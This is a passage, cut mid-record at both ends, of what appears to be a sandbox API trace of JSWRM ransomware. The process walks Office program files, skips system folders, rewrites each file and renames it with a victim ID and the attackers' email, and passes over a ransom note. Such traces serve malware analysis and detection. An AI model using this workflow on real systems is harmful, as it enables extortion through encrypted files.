Files\\Microsoft Office\\root\\Office16\\1033\\Bibliography\\BIBFORM.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\bibliography\\bibform.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0113.621] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=111310) returned 1 [0113.621] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b2c0) returned 0x24c1d0 [0113.621] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1b2c0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1b2c0, lpOverlapped=0x0) returned 1 [0113.630] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.630] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1b2c0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1b2c0, lpOverlapped=0x0) returned 1 [0113.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.631] CloseHandle (hObject=0x314) returned 1 [0113.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0113.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0113.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0113.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0113.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e340 [0113.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0113.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.631] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\Bibliography\\BIBFORM.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\bibliography\\bibform.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\Bibliography\\BIBFORM.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\bibliography\\bibform.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0113.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0113.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0113.632] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a60c80f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3a60c80f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3a60c80f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0113.633] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0113.633] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0113.633] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0113.633] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0113.633] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0113.633] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0113.633] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0113.633] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0113.633] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0113.633] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0113.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0113.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0113.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0113.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0113.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0113.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f98, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0113.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0113.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0113.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0113.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0113.633] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a60c80f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3a60c80f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3a60c80f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0113.633] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0113.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0113.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0113.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0113.634] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a96a42, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1a96a42, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1abcabc, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xde78, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="BSTORM.VSL", cAlternateFileName="")) returned 1 [0113.634] lstrcmpiW (lpString1="BSTORM.VSL", lpString2=".") returned 1 [0113.634] lstrcmpiW (lpString1="BSTORM.VSL", lpString2="..") returned 1 [0113.634] lstrcmpiW (lpString1="BSTORM.VSL", lpString2="...") returned 1 [0113.634] lstrcmpiW (lpString1="BSTORM.VSL", lpString2="windows") returned -1 [0113.634] lstrcmpiW (lpString1="BSTORM.VSL", lpString2="recovery") returned -1 [0113.634] lstrcmpiW (lpString1="BSTORM.VSL", lpString2="perflogs") returned -1 [0113.634] lstrcmpiW (lpString1="BSTORM.VSL", lpString2="documents and settings") returned -1 [0113.634] lstrcmpiW (lpString1="BSTORM.VSL", lpString2="$RECYCLE.BIN") returned 1 [0113.634] lstrcmpiW (lpString1="BSTORM.VSL", lpString2="system volume information") returned -1 [0113.634] lstrcmpiW (lpString1="BSTORM.VSL", lpString2="msocache") returned -1 [0113.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0113.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BSTORM.VSL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0113.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BSTORM.VSL", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BSTORM.VSL", lpUsedDefaultChar=0x0) returned 10 [0113.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0113.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0113.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BSTORM.VSL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0113.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BSTORM.VSL", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BSTORM.VSL", lpUsedDefaultChar=0x0) returned 10 [0113.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0113.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0113.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0113.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0113.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\BSTORM.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\bstorm.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.635] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=56952) returned 1 [0113.635] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xde70) returned 0x24c1d0 [0113.636] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xde70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xde70, lpOverlapped=0x0) returned 1 [0113.640] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.640] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xde70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xde70, lpOverlapped=0x0) returned 1 [0113.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.642] CloseHandle (hObject=0x238) returned 1 [0113.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0113.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0113.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0113.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0113.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0113.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0113.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.642] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\BSTORM.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\bstorm.vsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\BSTORM.VSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\bstorm.vsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0113.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0113.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0113.643] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x45348e5, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x45348e5, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x45348e5, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd7a, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="BW.CSS", cAlternateFileName="")) returned 1 [0113.643] lstrcmpiW (lpString1="BW.CSS", lpString2=".") returned 1 [0113.643] lstrcmpiW (lpString1="BW.CSS", lpString2="..") returned 1 [0113.643] lstrcmpiW (lpString1="BW.CSS", lpString2="...") returned 1 [0113.643] lstrcmpiW (lpString1="BW.CSS", lpString2="windows") returned -1 [0113.643] lstrcmpiW (lpString1="BW.CSS", lpString2="recovery") returned -1 [0113.643] lstrcmpiW (lpString1="BW.CSS", lpString2="perflogs") returned -1 [0113.643] lstrcmpiW (lpString1="BW.CSS", lpString2="documents and settings") returned -1 [0113.643] lstrcmpiW (lpString1="BW.CSS", lpString2="$RECYCLE.BIN") returned 1 [0113.643] lstrcmpiW (lpString1="BW.CSS", lpString2="system volume information") returned -1 [0113.643] lstrcmpiW (lpString1="BW.CSS", lpString2="msocache") returned -1 [0113.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BW.CSS", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0113.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BW.CSS", cchWideChar=6, lpMultiByteStr=0x345ebd8, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BW.CSS", lpUsedDefaultChar=0x0) returned 6 [0113.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BW.CSS", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0113.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BW.CSS", cchWideChar=6, lpMultiByteStr=0x345eba8, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BW.CSS", lpUsedDefaultChar=0x0) returned 6 [0113.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0113.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0113.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0113.644] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\BW.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\bw.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.644] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3450) returned 1 [0113.644] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd70) returned 0x206858 [0113.644] ReadFile (in: hFile=0x238, lpBuffer=0x206858, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xd70, lpOverlapped=0x0) returned 1 [0113.646] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.646] WriteFile (in: hFile=0x238, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xd70, lpOverlapped=0x0) returned 1 [0113.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0113.646] CloseHandle (hObject=0x238) returned 1 [0113.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0113.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0113.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0113.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0113.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0113.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.647] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\BW.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\bw.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\BW.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\bw.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0113.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0113.647] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x45348e5, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x45348e5, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x45348e5, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x860, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="CALEVENT.VRD", cAlternateFileName="")) returned 1 [0113.647] lstrcmpiW (lpString1="CALEVENT.VRD", lpString2=".") returned 1 [0113.647] lstrcmpiW (lpString1="CALEVENT.VRD", lpString2="..") returned 1 [0113.647] lstrcmpiW (lpString1="CALEVENT.VRD", lpString2="...") returned 1 [0113.647] lstrcmpiW (lpString1="CALEVENT.VRD", lpString2="windows") returned -1 [0113.648] lstrcmpiW (lpString1="CALEVENT.VRD", lpString2="recovery") returned -1 [0113.648] lstrcmpiW (lpString1="CALEVENT.VRD", lpString2="perflogs") returned -1 [0113.648] lstrcmpiW (lpString1="CALEVENT.VRD", lpString2="documents and settings") returned -1 [0113.648] lstrcmpiW (lpString1="CALEVENT.VRD", lpString2="$RECYCLE.BIN") returned 1 [0113.648] lstrcmpiW (lpString1="CALEVENT.VRD", lpString2="system volume information") returned -1 [0113.648] lstrcmpiW (lpString1="CALEVENT.VRD", lpString2="msocache") returned -1 [0113.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0113.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALEVENT.VRD", cchWideChar=12, 